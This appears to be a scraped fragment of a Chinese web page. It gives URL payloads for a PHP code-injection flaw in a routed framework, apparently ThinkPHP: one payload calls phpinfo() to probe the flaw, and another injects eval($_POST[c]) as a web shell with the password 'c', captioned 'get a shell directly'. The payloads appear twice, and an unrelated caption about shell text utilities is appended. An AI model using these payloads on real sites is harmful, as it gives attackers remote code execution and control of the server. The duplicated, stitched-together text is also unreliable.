http://site.com/index.php/module/action/param1/${@phpinfo()}
直接拿SHELL
index.php/module/action/param1/${@eval%28$_POST[c]%29} 密碼:c
http://site.com/index.php/module/action/param1/${@phpinfo()}
直接拿SHELL
index.php/module/action/param1/${@eval%28$_POST[c]%29} 密碼:c
![Shell程式設計——sort排序、uniq忽略重複、tr替換壓縮删除、cut指定删除字段、正規表達式元字元sort 指令uniq 指令tr 指令cut 指令正規表達式[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)